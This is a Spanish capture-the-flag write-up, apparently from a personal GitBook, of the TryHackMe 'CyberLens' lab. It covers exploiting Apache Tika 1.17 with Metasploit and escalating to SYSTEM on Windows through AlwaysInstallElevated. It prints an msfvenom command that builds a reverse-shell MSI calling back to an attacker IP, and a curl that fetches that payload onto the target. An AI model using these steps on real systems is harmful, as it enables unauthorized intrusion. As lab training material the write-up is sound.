Cyber
TryHackMe
TryHackMe
  • crack the hash
  • Juice Shop
  • MrRobot CTF
  • Ninja Skills
  • Basic Pen Testing
  • bank_ctf
  • blaster
  • OWASP TOP 10
  • eternalblue
  • ice
  • easypeasy
  • pentesting completo
  • kenobi
  • Overpass
  • OWASP ZAP
  • Post Explotacion
  • Relevant
  • RootCTF
  • Stealth
  • Uso de SILK
  • Wreath
  • Clocky
  • Wifi Hacking 101
  • SQLMap
  • Kitty
  • Opacity
  • Bricks Heist
  • Carnage
  • Snort
  • Daily Bugle
  • Creative
  • CyberLens
  • Insecure Deserialisation
Powered by GitBook
On this page

CyberLens

PreviousCreativeNextInsecure Deserialisation

Last updated 1 year ago

Comenzamos lanzando un nmap:

Acto seguido lanzamos un gobuster:

Pero tras el gobuster no sacamos ninguna ruta interesante asi que vamos a investigar la web:

Una de las webs interesantes que vemos es este extractor de metadatos de imagenes , primero intentamos a subir una webshell pero sin exito. Asi que vamos a mirar su codigo:

Y vemos como el extractor de metadatos esta haciendo referencia al puerto 61777 , vamos a acceder a él:

Y vemos como tenemos un apache tika server 1.17 vamos a buscarlo en searchsploit y ver si podemos generar una shell.

Y vemos como tenemos algunos exploits para utilizar.Vamos a probar con el primero:

Una vez descargado abrimos el metasploit y buscamos el modulo que nos hemos descargado:

Vamos a configurarlo y lanzarlo:

Y ya tendriamos una shell.Si buscamos en el desktop del usuario que en este caso es cyberlens:

Luego encontramos dentro del usuario tambien unas credenciales:

Luego lo que haremos sera utilizar de nuevo searchsploit:

Para esta vez utilizar el segundo exploit , pero para ello debemos primero generar nuestro shell de powershell:

Una vez generado seteamos el listener con el comando que aparece arriba a la derecha y luego ejecutamos el script con la reverse shell que acabamos de crear:

Y vemos como se nos genera una shell como cyberlens:

El siguiente paso es acceder como root , para ello primero vamos a descargarnos un script de este enlace:

Pero antes vamos a comprobar si esta corriendo algun antivirus o aplicacion que pueda limitarnos:

Get-MpComputerStatus

Y podemos ver como no hay ningun antivirus corriendo , asi que vamos a cargar el script en la maquina:

Primero montamos un servidor donde tenemos el script descargado , y luego lo subimos a la maquina objetivo:

Y lo corremos de esta forma:

. .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended

Y encontramos lo siguiente:

Este AlwaysInstallElevated quiere decir que podemos ejecutar codigo malicioso en un archivo MSI como SYSTEM por lo que podremos conseguir una shell con privilegios elevados. En el siguiente enlace podemos ver mas info de como aprovechar esta vulnerabilidad:

Podemos verificar que de verdad esta activado mirando el registro de windows:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Asi que lo que vamos a hacer ahora es crear un payload con msfvenom para aprovechar esta vulnerabilidad:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.200.148 -a x64 --platform Windows -f msi -o rev.msi

Ahora ya solo faltaria setear el listener en el puerto 443 , luegos pasarle el payload malicioso al equipo y ejecutarlo:

curl http://10.8.200.148/rev.msi -o rev.msi

Vemos como tenemos abierto el http , y algunos puertos para rpc
y ya tendriamos el user flag
hemos utilizado "tree /f" para ver todo el interior de la carpeta del usuario mas facilmente
una vez ejecutado en la otra ventana se nos popeo la shell como nt authority system
GitHub - itm4n/PrivescCheck: Privilege Escalation Enumeration Script for WindowsGitHub
AlwaysInstallElevated – Windows Privilege EscalationJuggernaut Pentesting Blog - A blog to help others achieve their goals in Cyber Security.
Logo
Logo